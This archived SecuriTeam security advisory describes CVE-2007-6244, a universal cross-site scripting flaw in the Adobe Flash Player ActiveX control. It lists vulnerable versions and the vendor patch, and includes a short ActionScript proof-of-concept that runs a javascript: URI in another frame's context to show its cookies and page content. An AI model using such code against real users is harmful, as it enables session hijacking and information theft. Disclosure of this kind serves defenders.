[NEWS] Adobe Flash Player ActiveX Control Universal Cross-Site Scripting Vulnerability



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



Adobe Flash Player ActiveX Control Universal Cross-Site Scripting
Vulnerability
------------------------------------------------------------------------


SUMMARY

This vulnerability allows remote attackers to run arbitrary JavaScript
code in the security context of other domains, resulting in information
disclosure and session hijacking. User interaction is required to exploit
this vulnerability in that the target must visit a malicious page or open
a malicious file.

The specific flaw exists in the Flash Player ActiveX Control's handling of
the navigateToURL API, which takes two arguments, a URL and the name of
the frame to be navigated. The SWF movie can pass in a javascript: URI and
the name of a frame on some other domain. The code in the URI executes in
the security context of the named frame, rather than the security context
of the SWF movie or the page that embeds it.

DETAILS

Vulnerable Systems:
* Adobe Flash Player version 9.0.48.0 and earlier
* Adobe Flash Player version 8.0.35.0 and earlier
* Adobe Flash Player version 7.0.70.0 and earlier

Vendor response:
The vendor has released appropriate patches available at:
<http://www.adobe.com/support/security/bulletins/apsb07-20.html>
http://www.adobe.com/support/security/bulletins/apsb07-20.html

Exploit:
package {
import flash.display.Sprite;
import flash.net.*;
import flash.utils.*;

public class uxssdemo extends Sprite {
public function uxssdemo() {
setTimeout(DoAttack, 1000);
}

public function DoAttack():void {
var request:URLRequest =
new URLRequest('javascript:alert("Cookie:
"+document.cookie+"\\n\\nContent: \\n\\n" +
document.lastChild.innerHTML);window.close();');
navigateToURL(request, 'tg');
}
}
}

CVE Information:
<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6244>
CVE-2007-6244


ADDITIONAL INFORMATION

The information has been provided by
<mailto:fulldisclosure@xxxxxxxxxxxxxxxxx> Collin Jackson.
The original article can be found at:
<http://crypto.stanford.edu/advisories/CVE-2007-6244/>
http://crypto.stanford.edu/advisories/CVE-2007-6244/



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • SecurityFocus Microsoft Newsletter #374
    ... Improve Security Through Proactive Network Assessment & Risk Analysis ... measure the effectiveness of your vulnerability management programs. ... Adobe Flash Player Policy File Cross Domain Security Bypass Vulnerability ... Given the nature of this issue, the attacker may be able to execute arbitrary code, but this has not been confirmed. ...
    (Focus-Microsoft)
  • [Full-disclosure] [ GLSA 200903-23 ] Adobe Flash Player: Multiple vulnerabilities
    ... The Adobe Flash Player is a renderer for the popular SWF file format, ... Security, Eduardo Vela, Matthew Mastracci of DotSpots, and Liu Die Yu ... Security Center are credited for finding an unspecified vulnerability ... reporting that an ActionScript attribute is not interpreted properly ...
    (Full-Disclosure)
  • [ GLSA 200903-23 ] Adobe Flash Player: Multiple vulnerabilities
    ... The Adobe Flash Player is a renderer for the popular SWF file format, ... Security, Eduardo Vela, Matthew Mastracci of DotSpots, and Liu Die Yu ... Security Center are credited for finding an unspecified vulnerability ... reporting that an ActionScript attribute is not interpreted properly ...
    (Bugtraq)
  • [ GLSA 200801-07 ] Adobe Flash Player: Multiple vulnerabilities
    ... Multiple vulnerabilities have been identified, ... The Adobe Flash Player is a renderer for the popular SWF file format, ... allowing for easier cross-site scripting attacks. ... sessions with arbitrary hosts, bypass the Security Sandbox Model, ...
    (Bugtraq)
  • [Full-disclosure] [ GLSA 200801-07 ] Adobe Flash Player: Multiple vulnerabilities
    ... Multiple vulnerabilities have been identified, ... The Adobe Flash Player is a renderer for the popular SWF file format, ... allowing for easier cross-site scripting attacks. ... sessions with arbitrary hosts, bypass the Security Sandbox Model, ...
    (Full-Disclosure)